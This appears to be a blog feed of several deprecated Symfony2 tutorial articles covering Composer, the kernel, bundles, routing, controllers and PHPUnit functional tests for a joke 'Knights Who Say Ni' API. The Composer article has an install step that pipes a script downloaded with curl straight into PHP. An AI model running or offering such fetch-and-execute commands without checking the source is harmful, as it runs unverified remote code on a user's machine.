I'd advise you to use an empty boilerplate with the Symfony Empty Edition:
composer create-project gnugat/symfony-framework-empty-edition <path-to-install>
Tip: For the production server, use this command to install the project's dependencies (the third party libraries):
composer install --no-dev --optimize
They integrate your code with the framework. More specifically, they configure the Kernel's dependency injection container.
Note: To learn more about Dependency Injection, have a look at the following articles:
The only bundle you'll need to create is the ApplicationBundle, where all your
code will be. Here's how to create a bundle:
mkdir -p src/<Vendor>/<Name>Bundle$EDITOR src/<Vendor>/<Name>Bundle/<Vendor><Name>Bundle.php$EDITOR app/AppKernel.phpA Bundle class looks like this:
<?php
// File: src/Knight/ApplicationBundle/KnightApplicationBundle.php
namespace Knight\ApplicationBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class KnightApplicationBundle extends Bundle
{
}
In your application, there's only a few files related to the Symfony2 framework. Here's the list of the ones you'll usually edit.
The app/AppKernel.php file is where the bundles are registered and where the
configuration is loaded. You'll only need to edit it when you install a new
bundle.
Here's how we would proceed: first install the bundle via Composer:
composer require [--dev] <vendor/name:version>
Then register it in the application's kernel:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Symfony\Bundle\SecurityBundle\SecurityBundle(),
new Symfony\Bundle\TwigBundle\TwigBundle(),
new Symfony\Bundle\MonologBundle\MonologBundle(),
new Symfony\Bundle\AsseticBundle\AsseticBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
new Sensio\Bundle\FrameworkExtraBundle\SensioFrameworkExtraBundle(),
// Add your bundles here!
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
$bundles[] = new Symfony\Bundle\WebProfilerBundle\WebProfilerBundle();
$bundles[] = new Sensio\Bundle\DistributionBundle\SensioDistributionBundle();
$bundles[] = new Sensio\Bundle\GeneratorBundle\SensioGeneratorBundle();
// Or here, if you want it to only be available in dev or test environment
}
return $bundles;
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
The app/config/routing.yml file is where you will link a controller's action
to an URL. Here's an example:
# File: app/config/routing.yml
ni:
path: /api/ni
methods:
- POST
defaults:
_controller: KnightApplicationBundle:Api:ni
question_to_cross_the_bridge:
path: /api/question/{number}
methods:
- GET
defaults:
_controller: KnightApplicationBundle:Api:question
As you can see, you can tell the routing to use placeholders, which will be then available in the controller via the Request object:
$request->query->get('number'); // query is an instance of ParameterBag
Each route is associated to a controller's action.
A controller is a class located in src/<Vendor>/ApplicationBundle/Controller,
suffixed with Controller.
An action is a controller's public method, suffixed with Action, which takes
a Request $request parameter and must return an instance of the Response
object:
<?php
// File: src/Knight/ApplicationBundle/Controller/ApiController.php
namespace Knight\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class ApiController extends Controller
{
public function niAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
$answer = array('answer' => 'Ecky-ecky-ecky-ecky-pikang-zoop-boing-goodem-zoo-owli-zhiv');
$statusCode = Response::HTTP_OK;
if (!isset($postedValues['offering']) || 'shrubbery' !== $postedValues['offering']) {
$answer['answer'] = 'Ni';
$statusCode = Response::HTTP_UNPROCESSABLE_ENTITY;
}
return new JsonResponse($answer, $statusCode);
}
}
Note: you can create sub-directories in src/<Vendor>/ApplicationBundle/Controller,
allowing you to categorize your controllers. In the routing, this would look
like this: KnightApplicationBundle:Subdirectory\Controller:action.
Of course you can use any test framework with a Symfony2 project. PHPUnit is one of them, and a popular one, so we'll use it for our examples.
Functional tests mirror the controllers and check if the status code is successful. If you're building an API, you can check more precisely the status code:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class ApiControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), array(), $content);
return $client->getResponse();
}
public function testOfferingTheRightThing()
{
$response = $this->post('/api/ni', array('offering' => 'shrubbery'));
$this->assertSame(Response::HTTP_OK , $response->getStatusCode());
}
public function testOfferingTheWrongThing()
{
$response = $this->post('/api/ni', array('offering' => 'hareng'));
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY , $response->getStatusCode());
}
}
The WebTestCase class is provided by the framework: it creates an application
(just like we do in web/app.php), so you can send requests and test the
response.
You can put your code anywhere in src/<Vendor>/ApplicationBundle.
Who said you needed to decouple your code from Symfony2? You can already write decoupled code!
A convention is to create directories named after the type of objects it holds.
For example the Controller contains controller classes (which are suffixed
with Controller). You don't have to follow it though (except for controllers
and commands): use your best judgement!
Symfony2 gets out of your way, the only class from the framework we need to use is the controller, the request and the response.
The workflow is really simple:
Request objectRequest object as a parameter and must return a
Response objectResponse object into the HTTP responsePractice.
We now know the strict minimum about Symfony2, and the only way to learn more is to practice, encounter new use cases, find answers in the documentation and ask questions on StackOverflow (if they haven't been already asked).
If you really want to master Symfony2, then stay tuned: I'll start writing a new series of articles!
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fifth article of the series on learning the Symfony2 framework. Have a look at the four first ones:
In the previous articles we created an application for the Knight of Ni with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config.yml
│ │ └── routing.yml
│ └── logs
│ └── .gitkeep
├── composer.json
├── composer.lock
├── src
│ └── Knight
│ └── ApplicationBundle
│ ├── Controller
│ │ └── ApiController.php
│ └── KnightApplicationBundle.php
├── .gitignore
└── web
└── app.php
Running composer install should create a vendor directory, which we ignored
with git.
Here's the repository where you can find the actual code.
In this article, we'll create functional tests using PHPUnit.
PHPUnit is a popular test framework. Its name is deceptive: you can write any kind of test with it (unit, functional, end to end, anything).
Let's install it in our project:
composer require --dev "phpunit/phpunit:~4.1"
The --dev options will prevent Composer from installing PHPUnit when running
composer install --no-dev: this is use in production (download is costly).
We will need to create a configuration file to tell PHPUnit to execute the tests
found in src/Knight/ApplicationBundle/Tests, and to use Composer as an
autoloader:
<?xml version="1.0" encoding="UTF-8"?>
<!-- File: app/phpunit.xml.dist -->
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit
backupGlobals="false"
colors="true"
syntaxCheck="false"
bootstrap="../vendor/autoload.php">
<testsuites>
<testsuite name="Functional Test Suite">
<directory>../src/Knight/ApplicationBundle/Tests</directory>
</testsuite>
</testsuites>
</phpunit>
Note: By convention
you should put your tests in src/Knight/ApplicationBundle/Tests. It's not hard
coded though, but if you want people to find things where they expect them to be
you better follow them ;) .
This file is suffixed with .dist because we intend to allow developer to
override the configuration by creating a app/phpunit.xml file. Only the
distribution file should be commited, though:
echo '/app/phpunit.xml' >> .gitignore
git add -A
git commit -m 'Installed PHPUnit'
For our functional tests, we will be using the WebTestCase class: it
instanciates our AppKernel with the test environment. It also uses a
test.client service, which is disabled by default.
In order to enable this service, we must change the configuration:
# File: app/config/config.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
router:
resource: %kernel.root_dir%/config/routing.yml
# test: ~
Sometimes, you don't want your configuration to be the same for your tests and your production server. That's what environments are for. Let's put this test specific configuration in a different file:
# File: app/config/config_test.yml
imports:
- { resource: config.yml }
framework:
test: ~
Note: the imports parameter allows you to include other configuration files.
You can then overwrite the included parameters, or add new ones.
We should also change the registerContainerConfiguration method of the
AppKernel class in order to load the test configuration, depending on the
environment:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Knight\ApplicationBundle\KnightApplicationBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$file = 'config';
if ('test' === $this->getEnvironment()) {
$file .= '_test';
}
$loader->load(__DIR__."/config/$file.yml");
}
}
Let's commit our work:
git add -A
git commit -m 'Added test configuration'
Our test must check that the application behaves as expected. We won't be checking that it actually fulfills our business expectations. This means that checking the HTTP status code is entirely sufficient.
Let's create the directory:
mkdir -p src/Knight/ApplicationBundle/Tests/Controller
Note: Again, by convention, your test directory structure must mirror the one found in the bundle.
And then our first functional test:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight/ApplicationBundle/Tests/Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
class ApiControllerTest extends WebTestCase
{
public function testOfferingTheRightThing()
{
$method = 'POST';
$uri = '/api/ni';
$parameters = array();
$files = array();
$server = array();
$content = json_encode(array(
'offering' => 'shrubbery',
));
$client = static::createClient();
$client->request($method, $uri, $parameters, $files, $server, $content);
$response = $client->getResponse();
$this->assertTrue($response->isSuccessful());
}
}
To make sure the test pass, run the following command:
./vendor/bin/phpunit -c app
Composer has installed a binary in vendor/bin, and the -c option allows you
to tell PHPUnit where the configuration is (in ./app).
This looks a bit long because of the content parameter... We can improve this with helper methods:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight/ApplicationBundle/Tests/Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
class ApiControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), array(), $content);
return $client->getResponse();
}
public function testOfferingTheRightThing()
{
$response = $this->post('/api/ni', array('offering' => 'shrubbery'));
$this->assertTrue($response->isSuccessful());
}
}
Make sure the test still pass:
./vendor/bin/phpunit -c app
The Response's isSuccessful method only checks that the status code is 200ish.
Here's a test for failure cases:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight/ApplicationBundle/Tests/Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
class ApiControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), array(), $content);
return $client->getResponse();
}
public function testOfferingTheRightThing()
{
$response = $this->post('/api/ni', array('offering' => 'shrubbery'));
$this->assertTrue($response->isSuccessful());
}
public function testOfferingTheWrongThing()
{
$response = $this->post('/api/ni', array('offering' => 'hareng'));
$this->assertFalse($response->isSuccessful());
}
}
Run the tests:
./vendor/bin/phpunit -c app
Note: At this point running the tests should become a habit. Make sure to run them whenever you finish a change, and to run them before commiting anything.
In my humble opinion, checking if the status code is 200ish and not checking the response content is entirely sufficient for functional tests.
When creating REST API, it can prove useful to test more precisely the status code. Our application is a REST API, so let's do this:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight/ApplicationBundle/Tests/Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class ApiControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), array(), $content);
return $client->getResponse();
}
public function testOfferingTheRightThing()
{
$response = $this->post('/api/ni', array('offering' => 'shrubbery'));
$this->assertSame(Response::HTTP_OK , $response->getStatusCode());
}
public function testOfferingTheWrongThing()
{
$response = $this->post('/api/ni', array('offering' => 'hareng'));
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY , $response->getStatusCode());
}
}
Run the tests:
./vendor/bin/phpunit -c app
All green! That's comforting enough for us to commit our work and call it a day!
git add -A
git commit -m 'Added tests'
Running ./vendor/bin/phpunit -c app is less cumbersome than having to run
manually HTTPie (like in the previous article)!
Writing functional tests is easy and quick, the only thing you need to do is check if the HTTP response's status code is successful (and for REST API you need to check the precise HTTP response's status code).
The next article will be the conclusion of this series, I hope you enjoyed it!
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fourth article of the series on learning the Symfony2 framework. Have a look at the three first ones:
In the previous articles we created a one-bundled empty application with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ └── config.yml
│ └── logs
│ └── .gitkeep
├── composer.json
├── composer.lock
├── src
│ └── Knight
│ └── ApplicationBundle
│ └── KnightApplicationBundle.php
├── .gitignore
└── web
└── app.php
Running composer install should create a vendor directory, which we ignored
with git.
Here's the repository where you can find the actual code.
In this article, we'll learn more about the routing and the controllers.
In order to get familiar with the routing and controllers, we will create a route which returns nothing. The first thing to do is to configure the router:
# File: app/config/app.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
router:
resource: %kernel.root_dir%/config/routing.yml
We can now write our routes in a separate file:
# File: app/config/routing.yml
what_john_snow_knows:
path: /api/ygritte
methods:
- GET
defaults:
_controller: KnightApplicationBundle:Api:ygritte
As you can see, a route has:
what_john_snow_knows)/api/ygritte)GET)Knight\ApplicationBundle\Controller\ApiController::ygritteAction()Note: the _controller parameter is a shortcut composed of three parts, which
are the name of the bundle, then the unprefixed controller name and finally the
unprefixed method name.
Now we need to create the following directory:
mkdir src/Knight/ApplicationBundle/Controller
And to create the controller class:
<?php
// File: src/Knight/ApplicationBundle/Controller/ApiController.php
namespace Knight\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class ApiController extends Controller
{
public function ygritteAction(Request $request)
{
return new Response('', Response::HTTP_NO_CONTENT);
}
}
To test it, I'd advise you to use a HTTP client. Let's install HTTPie, the CLI HTTP client:
sudo apt-get install python-pip
sudo pip install --upgrade httpie
We can now test our webservice:
http GET knight.local/api/ygritte
The first line should be HTTP/1.1 204 No Content.
Our scrum master and product owner managed to write a user story for us:
As a Knight of Ni
I want a webservice which says "ni"
In order to get a shrubbery
This means we're going to need the following route:
# File: app/config/routing.yml
ni:
path: /api/ni
methods:
- POST
defaults:
_controller: KnightApplicationBundle:Api:ni
Our controller will retrieve the posted value (named offering), check if it
is a shrubbery and send back a response containing either Ni (on error) or
Ecky-ecky-ecky-ecky-pikang-zoop-boing-goodem-zoo-owli-zhiv (on success):
<?php
// File: src/Knight/ApplicationBundle/Controller/ApiController.php
namespace Knight\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class ApiController extends Controller
{
public function niAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
$answer = array('answer' => 'Ecky-ecky-ecky-ecky-pikang-zoop-boing-goodem-zoo-owli-zhiv');
$statusCode = Response::HTTP_OK;
if (!isset($postedValues['offering']) || 'shrubbery' !== $postedValues['offering']) {
$answer['answer'] = 'Ni';
$statusCode = Response::HTTP_UNPROCESSABLE_ENTITY;
}
return new JsonResponse($answer, $statusCode);
}
}
The JsonResponse class will convert the array into JSON and set the proper
HTTP headers.
If we try to submit something fishy like this:
http POST knight.local/api/ni offering=hareng
Then we should have a response similar to:
HTTP/1.1 422 Unprocessable Entity
Cache-Control: no-cache
Content-Type: application/json
Date: Thu, 10 Jul 2014 15:23:00 GMT
Server: Apache
Transfer-Encoding: chunked
{
"answer": "Ni"
}
And when we submit the correct offering:
http POST knight.local/api/ni offering=shrubbery
Then we should have something similar to:
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Thu, 10 Jul 2014 21:42:00 GMT
Server: Apache
Transfer-Encoding: chunked
{
"answer": "Ecky-ecky-ecky-ecky-pikang-zoop-boing-goodem-zoo-owli-zhiv"
}
Here's part of the Request's API:
<?php
namespace Symfony\Component\HttpFoundation;
class Request
{
public $request; // Request body parameters ($_POST)
public $query; // Query string parameters ($_GET)
public $files; // Uploaded files ($_FILES)
public $cookies; // $_COOKIE
public $headers; // Taken from $_SERVER
public static function createFromGlobals():
public static function create(
$uri,
$method = 'GET',
$parameters = array(),
$cookies = array(),
$files = array(),
$server = array(),
$content = null
);
public function getContent($asResource = false);
}
We used createFromGlobals in our front controller (web/app.php), it does
excalty what it says: it initializes the Request from the PHP superglobals
($_POST, $_GET, etc).
The create method is really handful in tests as we won't need to override the
values in PHP's superglobals.
The attributes here listed are all instances of
Symfony\Component\HttpFoundation\ParameterBag, which is like an object
oriented array with set, has and get methods (amongst others).
When you submit a form, your browser automatically sets the HTTP request's
header Content-Type to application/x-www-form-urlencoded, and the form
values are sent in the request's content like this:
offering=hareng
PHP understands this and will put the values in the $_POST superglobal. This
mean you could retrieve it like this:
$request->request->get('offering');
However, when we submit something in JSON with the Content-Type set to
application/json, PHP doesn't populate $_POST. You need to retrieve the raw
data with getContent and to convert it using json_decode, as we did in our
controller.
Here's a part of the Response's API:
<?php
namespace Symfony\Component\HttpFoundation;
class Response
{
const HTTP_OK = 200;
const HTTP_CREATED = 201;
const HTTP_NO_CONTENT = 204;
const HTTP_UNAUTHORIZED = 401;
const HTTP_FORBIDDEN = 403;
const HTTP_NOT_FOUND = 404;
const HTTP_UNPROCESSABLE_ENTITY = 422; // RFC4918
public $headers; // @var Symfony\Component\HttpFoundation\ResponseHeaderBag
public function __construct($content = '', $status = 200, $headers = array())
public function getContent();
public function getStatusCode();
public function isSuccessful();
}
There's a lot of HTTP status code constants, so I've selected only those I'd use the most.
You can set and get the Response's headers via a public property which is also
a ParameterBag.
The constructor allows you to set the content, status code and headers.
The three other methods are mostly used in tests. There's a lot of is methods
to check the type of the request, but usually you'll just want to make sure the
response is successful.
You can find other types of responses:
JsonResponse: sets the Content-Type and converts the content into JSONBinaryFileResponse: sets headers and attaches a file to the responseRedirectResponse: sets the target location for a redirectionStreamedResponse: useful for streaming large filesSymfony2 is an HTTP framework which primary's public API are the controllers: those receive a Request as parameter and return a Response. All you have to do is to create a controller, write some configuration in order to link it to an URL and you're done!
Do not forget to commit your work:
git add -A
git commit -m 'Created Ni route and controller'
The next article should be about tests: stay tuned!
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the third article of the series on learning the Symfony2 framework. Have a look at the two first ones:
In the previous articles we began to create an empty application with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ └── config.yml
│ └── logs
│ └── .gitkeep
├── composer.json
├── composer.lock
├── .gitignore
└── web
└── app.php
Running composer install should create a vendor directory, which we ignored
with git.
Here's the repository where you can find the actual code.
We'll now see what a bundle is.
We'll need some use case in order for our code snippets to make sense. So here it is: the Knights Who Say 'Ni', demand a webservice! It shall say 'ni' if the user do not appease it. To do so, the user should post a shrubbery!
Let's create our application bundle, in order to have a place where we can put our code. To do so we need to create the directory:
mkdir -p src/Knight/ApplicationBundle
Then the class extending Symfony\Component\HttpKernel\Bundle\Bundle:
<?php
// File: src/Knight/ApplicationBundle/KnightApplicationBundle.php
namespace Knight\ApplicationBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class KnightApplicationBundle extends Bundle
{
}
Finally we register the bundle into our application:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Knight\ApplicationBundle\KnightApplicationBundle(), // <-- Here!
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config.yml');
}
}
Let's commit our work:
git add -A
git commit -m 'Created Application bundle'
The KnightApplicationBundle class extends the following one:
<?php
namespace Symfony\Component\HttpKernel\Bundle;
use Symfony\Component\DependencyInjection\ContainerAware;
use Symfony\Component\Console\Application;
abstract class Bundle extends ContainerAware implements BundleInterface
{
public function getContainerExtension();
public function registerCommands(Application $application);
}
Note: Only the part we're interested in is shown here.
Those two methods make the bundle capable of autodiscovering its commands and its Dependency Injection Container's (DIC) extension, if the following directory directory structure is used:
.
├── Command
│ └── *Command.php
├── DependencyInjection
│ └── KnightApplicationExtension.php
└── KnightApplicationBundle.php
Note: the only file required in a bundle is the KnightApplicationBundle.php
one.
The name of a bundle (in our example KnightApplication) is composed of:
Knight)Application)For your own sake, choose a small one-word name for you vendor name and for your bundle name (there's no hard rules but that's my advice).
The KnightApplicationExtension class allows you to manipulate the DIC (more
often you'll load a configuration file which can be located in
Resources/config/services.xml).
And that's precisely the purpose of bundles: registering services in the application's DIC.
Services and Dependency Injection isn't in the scope of this series. However if you want to discover what it is all about, have a look at these two articles:
Note: this is a kindly reminder about the nature of Symfony2 Components. Those are third party libraries which can be used on their own outside of the framework.
The Symfony2 Console Component allows you to create CLI applications. This application can have one or many commands. To learn more about them, have a look at this article:
Note: commands aren't in the scope of this article, but they're worth mentioning.
There's two kinds of bundle:
Let's take the KnpLabs snappy library: it allows you to generate a PDF from a HTML page and can be used in any applications (non-symfony ones, and even framework-less ones).
The class allowing this generation is
Knp\Bundle\SnappyBundle\Snappy\LoggableGenerator: its construction is a bit
tiresome. To fix this, we can define its construction inside the DIC and
fortunately there's already a bundle doing it for us:
KnpSnappyBundle.
That's a good example of the first kind of bundles.
Now about the second kind: in our Symfony2 application, we'll need to integrate our own code to it, one day or another. We could go the long and painful way (writing a lot of boilerplate code and configurations), or we could use a bundle to do automatically the job for us!
Sometimes, we'll find applications which have many bundles in order to categorize them into modules. This isn't necessary and it's a bit tiresome if you ask me: we can simply create folders in a unique bundle to categorize our modules.
The creation of many bundles necessitates some extra manual steps. It also makes little sense as a bundle is supposed to be a decoupled unit: if we create a UserBundle, FrontendBundle, BlogBundle and ForumBundle, we'll find ourselves with bundles depending on one another, often with cyclic dependencies and we'll waste time wondering where to put new classes (which can rely on 3 bundles).
My advice: create a single bundle for your application. If later on you find that inside it you created a set of classes which makes sense in other projects (Symfony2 and non-Symfon2 ones alike), then maybe you can extract them to create a third party library. And then you might create a bundle to integrate it inside Symfony2 applications.
Bundles are a way to extend the Dependency Injection Container: they're the glue layer between your code and Symfony2 applications.
They follow conventions which aren't hard coded (you can override anything), allowing them to autodiscover some convenient classes.
Thanks for reading, in the next article, we'll create controllers!
Here's a good article about how reusable bundles should be created:
You don't like the conventions and you're ready to write a lot of boilerplate code and configuration? Here you go (I'd not advise you to do so, though):
I'm only putting these links because I like how they explain how Symfony2 works behind the hood, but I wouldn't apply them in a real world application as it makes too much fuss to no avail (that's my humble opinion anyway).
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the second article of the series on learning the Symfony2 framework. Have a look at the first one: Composer.
In the first article we began to create an empty project with the following files:
.
├── composer.json
├── composer.lock
└── .gitignore
Running composer install should create a vendor directory, which we ignored
in git.
Here's the repository where you can find the actual code.
We'll now see how to create an empty Symfony2 application.
First things first, we will create an index file which will act as a front controller: it will be the only entry point of our application and will decide which page to display.
Create its directory:
mkdir web
Then the file:
<?php
// File: web/app.php
use Symfony\Component\HttpFoundation\Request;
require_once __DIR__.'/../vendor/autoload.php';
require_once __DIR__.'/../app/AppKernel.php';
$kernel = new AppKernel('prod', false);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
$kernel->terminate($request, $response);
First it includes Composer's autoloader: it will require every files needed.
Then we create an instance of our Kernel with the production environment and the debug utilities disabled. This class acts like a web server: it takes a HTTP request as input and returns a HTTP response as output.
Request::createFromGlobals() creates a representation of the HTTP request.
It is filled from PHP's variable super globals ($_GET, $_POST, etc).
The kernel then handles the request. To keep explanations short, let's simply
say that it will find the controller associated to the requested URL. It is the
controller's responsibility to return a representation of the HTTP response (see
Symfony\Component\HttpFoundation\Response).
The $response->send() method will simply call the PHP header function and
print a string representing the response's body (usually HTML, JSON or anything
you want).
Finally the $kernel->terminate() method will call any tasks which registered
to the kernel.terminate event. This alows you to return a response as fast as
possible and then execute some actions like sending emails.
Note: events aren't in the scope of this article, but they're worth mentioning.
The HttpKernel component
provides you with a Kernel class, which we will extend.
Create the following directory:
mkdir app
And then the kernel file:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config.yml');
}
}
This class will load the project's configuration. This is also where you register the project's bundles. We'll talk more about bundles in the next article, for now the only thing you need to know is that they're like plugins.
The Kernel has the responsibility to look at every registered bundle to retrieve their configuration.
The FrameworkBundle defines some services and allows you to choose what to
enable via configuration.
Note: Services are objects which do one thing and do it well. They provide exactly what they're called: a service. We'll learn more about them in one of the next article.
We need to put some configuration in order to be able to make it work properly.
Create its directory:
mkdir app/config
And the the YAML file:
# File: app/config/config.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
The secret parameter is used as a seed to generate random strings (for e.g.
CSRF tokens).
Now that we have our application structure, let's commit it:
git add -A
git commit -m 'Created application structure'
You'll also need to create logs and cache directories:
mkdir app/{cache,logs}
touch app/{cache,logs}/.gitkeep
Git doesn't allow to commit empty directory, hence the .gitkeep files.
Because files in these directories are temporaries, we'll ignore them:
echo '/app/cache/*' >> .gitignore
echo '/app/logs/*' >> .gitignore
git add -A
git add -f app/cache/.gitkeep
git add -f app/logs/.gitkeep
git commit -m 'Created temporary directories'
In order for your website to be browsed, you'll need to configure your web server. This configuration is well explained in the documentation, so here's a dump of an apache vhost:
<VirtualHost *:80>
ServerName knight.local
DocumentRoot /home/loic.chardonnet/Projects/gnugat/knight/web
ErrorLog "/home/loic.chardonnet/Projects/gnugat/knight/app/logs/apache_errors.log"
CustomLog "/home/loic.chardonnet/Projects/gnugat/knight/app/logs/apache_accesses.log" common
<Directory /home/loic.chardonnet/Projects/gnugat/knight/web>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ /app.php [QSA,L]
</IfModule>
</Directory>
</VirtualHost>
If you run into some permission problem (like writing in cache and logs),
you might consider to change APACHE_RUN_USER and APACHE_RUN_GROUP
environment variables present in /etc/apache2/envvars to your own user and
group.
A Symfony2 application follows this pattern: a front controller associate an URL to a controller which takes a HTTP request and returns a HTTP response.
The next article will be all about bundles, so stay tuned :) .
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
You don't know anything about the Symfony2 framework, and you'd like a quick guide to learn how to use it, and how it works?
Then this article is for you :) .
Don't get me wrong: one day or another you'll have to read the documentation, and you'll have to practice a lot in order to master it. But for now this guide should be a good start for you.
In the first article of this series, you'll learn about Composer, which helps you with third party library installation and updates.
In order to understand how Symfony2 works, we won't use the Symfony Standard Edition, but rather start from scratch with the bare minimum.
Let's create our project:
mkdir knight
cd knight
git init
When developing a project the last thing you want is to waste your time re-inventing the wheel, so you install third party libraries. Those libraries have their own life cycle: they might release some bug fixes and new features after you installed them, so you'll need to update them sometimes.
Composer makes these things so easy you'll never have to worry again about versions. First download it:
curl -sS https://getcomposer.org/installer | php
sudo mv composer.phar /usr/local/bin/composer
And we're done! If only every project were so easy to install... :)
Actually, Symfony2 is only a name regrouping many libraries which can be used individually (you can even use them in other frameworks, CMS or projects like Drupal, phpBB, Laravel, eZ Publish, OroCRM and Piwik did).
Note: Symfony2 libraries are called components.
Composer was made to install libraries, so let's use it:
composer require 'symfony/symfony:~2.5' # install every single libraries in sf2
This command will do the following steps:
composer.json configuration file if it doesn't already existsymfony/symfony: ~2.5 in it (useful for further composer install)vendor/symfony/symfony directorycomposer.lock fileLater on, to update those dependencies you'll just have to run
composer update.
Note: a library on which you depend upon is called a dependency.
This will look in the composer.lock file to know which version has been
installed (e.g. 2.5.0) and then checks if there's any new version available.
For more information about how Composer handles versions, see
Igor's article.
This means that you can totally ignore the vendor directory:
echo '/vendor/*' >> .gitignore
If your team wants to install your project, they'll just have to clone your
repository and then run composer install which runs into the following steps:
composer.json file to see the list of dependenciescomposer.lock file to check the version installed by the commiterIf a dependency is listed in composer.json but not in composer.lock,
Composer will download the last matching version and add it to the lock.
This means that everyone will have the same version installed! If you allow only
one person to run composer update you can guarantee this.
Because Composer knows where each classes of the installed libraries are, it provides a nice feature: autoloading.
Simply put, each time a class is called, Composer will automatically include the file where it's declared.
Your own code too can benefit from it. We just need to edit the composer.json
file:
{
"require": {
"symfony/symfony": "~2.5"
},
"autoload": {
"psr-4": {
"": "src/"
}
}
}
And run the following command to take the changes into account:
composer update
This tells Composer that we're going to follow the
PSR-4 standard and that we're going to put
our sources in the src directory.
Note: PSR 4 requires you to:
For example: the file src/Knight/ApplicationBundle/KnightApplicationBundle.php
contains a class named KnightApplicationBundle located in the namespace
Knight\ApplicationBundle.
Don't worry too much about it for now.
And that's everything you need to know about Composer for now. Let's commit our work:
git add -A
git commit -m 'Installed Symfony2'
I hope this could help you, stay tuned for the next articles!
]]>While I don't mind the "learn by practice" approach (that's actually my favorite way of learning), it's inconvenient as you might have to re-discover things when using it again two month later.
To fix this, I'll try to provide a small reference guide in this article.
A token is just a unique identifier allowing you to define what you're manipulating: PHP keywords, function names, whitespace and comments are all be represented as tokens.
If you want to programmatically read a PHP file, analyze its source code and possibly manipulate it and save the changes, then tokens will make your life easier.
Here's some actual examples of what tokens are used for:
